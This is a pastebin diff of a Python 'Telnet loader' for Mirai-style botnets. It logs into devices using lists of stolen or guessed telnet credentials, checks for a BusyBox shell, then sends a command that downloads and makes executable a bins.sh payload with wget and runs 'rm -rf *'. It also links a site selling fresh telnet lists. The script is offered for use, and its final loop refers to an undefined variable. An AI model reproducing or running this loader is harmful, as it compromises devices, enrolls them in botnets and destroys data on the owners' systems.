SHOW:
|
|
- or go back to the newest paste.
1 | #!/usr/bin/python | |
2 | - | # Telnet loader v1.4 *Minor bug fix* | By LiGhT |
2 | + | # Telnet loader | have fun Yo! This Loads Mostly BuZy BoXeS regulr format/Mirai. |
3 | - | # Update: Loads mirai format lists and "ip:user:pass" regular lists simultaneously and fixed IndexError issue |
3 | + | # You Can Find Fresh TELNET List To Load @ http://godz56.tk/telnet-list/ |
4 | - | # Bruter: https://pastebin.com/Xuw1usfi |
4 | + | # Simple Telnet Loader Ya d1g? |
5 | ||
6 | import sys, re, os, socket, time | |
7 | from multiprocessing import Process | |
8 | ||
9 | if len(sys.argv) < 2: | |
10 | sys.exit("\033[37mUsage: python "+sys.argv[0]+" [list]") | |
11 | ||
12 | cmd="cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://0.0.0.0/bins.sh; chmod 777 bins.sh; rm -rf *" #command to send | |
13 | - | cmd="" #command to send |
13 | + | |
14 | ||
15 | def readUntil(tn, string, timeout=8): | |
16 | buf = '' | |
17 | start_time = time.time() | |
18 | while time.time() - start_time < timeout: | |
19 | buf += tn.recv(1024) | |
20 | time.sleep(0.01) | |
21 | if string in buf: return buf | |
22 | raise Exception('TIMEOUT!') | |
23 | ||
24 | ||
25 | def infect(ip,username,password): | |
26 | ip = str(ip).rstrip("\n") | |
27 | username = username.rstrip("\n") | |
28 | password = password.rstrip("\n") | |
29 | try: | |
30 | tn = socket.socket() | |
31 | tn.settimeout(10) | |
32 | tn.connect((ip,23)) | |
33 | except Exception: | |
34 | tn.close() | |
35 | try: | |
36 | hoho = '' | |
37 | hoho += readUntil(tn, "ogin") | |
38 | if "ogin" in hoho: | |
39 | tn.send(username + "\n") | |
40 | time.sleep(0.09) | |
41 | except Exception: | |
42 | tn.close() | |
43 | try: | |
44 | hoho = '' | |
45 | hoho += readUntil(tn, "assword:") | |
46 | if "assword" in hoho: | |
47 | tn.send(password + "\n") | |
48 | time.sleep(0.8) | |
49 | else: | |
50 | pass | |
51 | except Exception: | |
52 | tn.close() | |
53 | try: | |
54 | prompt = '' | |
55 | prompt += tn.recv(40960) | |
56 | if ">" in prompt and "ONT" not in prompt: | |
57 | try: | |
58 | success = False | |
59 | tn.send("cat | sh" + "\n") | |
60 | time.sleep(0.1) | |
61 | timeout = 8 | |
62 | data = ["BusyBox", "Built-in"] | |
63 | tn.send("sh" + "\n") | |
64 | time.sleep(0.01) | |
65 | tn.send("busybox" + "\r\n") | |
66 | buf = '' | |
67 | start_time = time.time() | |
68 | while time.time() - start_time < timeout: | |
69 | buf += tn.recv(40960) | |
70 | time.sleep(0.01) | |
71 | for info in data: | |
72 | if info in buf and "unrecognized" not in buf: | |
73 | success = True | |
74 | break | |
75 | except: | |
76 | pass | |
77 | elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt: | |
78 | try: | |
79 | success = False | |
80 | timeout = 8 | |
81 | data = ["BusyBox", "Built-in"] | |
82 | tn.send("sh" + "\n") | |
83 | time.sleep(0.01) | |
84 | tn.send("shell" + "\n") | |
85 | time.sleep(0.01) | |
86 | tn.send("help" + "\n") | |
87 | time.sleep(0.01) | |
88 | tn.send("busybox" + "\r\n") | |
89 | buf = '' | |
90 | start_time = time.time() | |
91 | while time.time() - start_time < timeout: | |
92 | buf += tn.recv(40960) | |
93 | time.sleep(0.01) | |
94 | for info in data: | |
95 | if info in buf and "unrecognized" not in buf: | |
96 | success = True | |
97 | break | |
98 | except: | |
99 | pass | |
100 | else: | |
101 | tn.close() | |
102 | if success == True: | |
103 | try: | |
104 | tn.send(cmd + "\n") | |
105 | print "\033[32m[\033[31m+\033[32m] \033[33mCommand Sent!\033[32m %s"%(ip) | |
106 | time.sleep(20) | |
107 | tn.close() | |
108 | except: | |
109 | tn.close() | |
110 | tn.close() | |
111 | except Exception: | |
112 | tn.close() | |
113 | ||
114 | for x in info: | |
115 | try: | |
116 | if ":23 " in x: | |
117 | x = x.replace(":23 ", ":") | |
118 | xinfo = x.split(":") | |
119 | session = Process(target=infect, args=(xinfo[0].rstrip("\n"),xinfo[1].rstrip("\n"),xinfo[2].rstrip("\n"),)) | |
120 | session.start() | |
121 | ip=xinfo[0] | |
122 | username=xinfo[1] | |
123 | password=xinfo[2] | |
124 | time.sleep(0.01) | |
125 | except: | |
126 | pass | |
127 | session.join() |